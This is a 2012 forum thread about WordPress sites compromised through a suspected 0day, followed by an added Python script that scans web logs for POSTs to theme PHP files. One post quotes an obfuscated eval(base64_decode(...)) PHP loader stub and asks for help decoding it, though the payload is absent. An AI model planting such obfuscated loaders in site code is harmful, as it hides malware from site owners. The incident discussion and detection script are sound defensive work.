New wordpress exploit

Discussion in 'Security' started by dev22, Jan 23, 2012.

  1. BCRed

    #21
    Anyone found the source of this exploit yet? It hit two of the 25 or so sites on my server, so we fixed those up manually and updated their WordPress versions. Like several of you, I've got multiple cPanels on a VPS and only one got hit. Is this a local WordPress exploit? Or something that I should be concerned with for my entire server?
     
    BCRed, Feb 6, 2012
  2. HostingLynx

    #22
    There are only theories as to what it is, but as of right now I believe it's a 0day.
     
    HostingLynx, Feb 7, 2012
  3. dalem

    #23
    Maybe of interest to you guys, but just out of curiosity I did a database dump of one of my WP sites and started looking through it. There is all sorts of crap in there from certain plugins/widgets that I installed. If I can remember the plugins I'll post it here. I am sure one of them was a tag cloud plugin. I have since deleted the plugins and cleaned up the database.
     
    dalem, Feb 7, 2012
  4. netranger

    #24
    Can any of you help me decode the following and explain step by step how do you decode it? Especially the last part with the javascript code:
    eval(base64_decode('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'));
     
    netranger, May 3, 2012
  5. obzerver

    #25
    Hi guys,

    One of my sites was also recently hacked with similar characteristics. Upon checking my logs, it looks as if they got in via a POST request to functions.php in the twentyeleven theme. I only just discovered it, so not sure exactly how it was compromised as yet, but the first step seems to modify functions.php with a feedback check to see if they obtained access, then they modified the main index.php.

    The twentyeleven theme was not even active either, so I've removed the twentyten & twentyeleven themes as a precaution.
     
    obzerver, May 6, 2012
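
The log check obzerver describes above (POST requests sent straight to a theme's functions.php), written out as an added example that is not part of the original thread. The log lines are constructed, and the Apache combined log format, the active theme name `mytheme` and the function names are assumptions.

```python
import re
from collections import Counter

# Constructed sample in Apache "combined" format (not taken from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [05/May/2012:03:14:07 +0000] "POST /wp-content/themes/twentyeleven/functions.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.7 - - [05/May/2012:03:14:09 +0000] "POST /wp-content/themes/twentyeleven/functions.php HTTP/1.1" 200 5 "-" "Mozilla/5.0"
198.51.100.20 - - [05/May/2012:03:15:00 +0000] "GET /wp-content/themes/mytheme/style.css HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.20 - - [05/May/2012:03:15:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"
192.0.2.55 - - [05/May/2012:04:00:11 +0000] "POST /blog/wp-content/themes/twentyten/functions.php?x=1 HTTP/1.1" 404 210 "-" "curl/7.21"
this line is not a log entry
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# A .php file anywhere under a theme directory, with or without a query string.
THEME_PHP_RE = re.compile(
    r'/wp-content/themes/(?P<theme>[^/?#]+)/[^?#]*\.php(?:[?#]|$)', re.I)

def find_theme_posts(log_text, active_theme):
    """Return one finding per POST aimed directly at a PHP file in a theme."""
    findings = []
    for line in log_text.splitlines():
        entry = LINE_RE.match(line)
        if not entry or entry["method"] != "POST":
            continue  # unparseable line, or not a POST
        hit = THEME_PHP_RE.search(entry["path"])
        if not hit:
            continue
        status = int(entry["status"])
        findings.append({
            "ip": entry["ip"], "time": entry["ts"], "path": entry["path"],
            "theme": hit["theme"], "status": status,
            # In the post above the targeted theme was not the active one.
            "inactive_theme": hit["theme"].lower() != active_theme.lower(),
            "served": 200 <= status < 300,  # the server answered with 2xx
        })
    return findings

def served_by_ip(findings):
    """Count theme-file POSTs answered with 2xx, per client address."""
    return Counter(f["ip"] for f in findings if f["served"])

if __name__ == "__main__":
    for f in find_theme_posts(SAMPLE_LOG, active_theme="mytheme"):
        flag = "inactive theme" if f["inactive_theme"] else "active theme"
        print(f'{f["time"]} {f["ip"]} {f["status"]} {f["path"]} ({flag})')
```

A finding with `served` set is the cue to compare that theme file against a clean copy from the matching WordPress release.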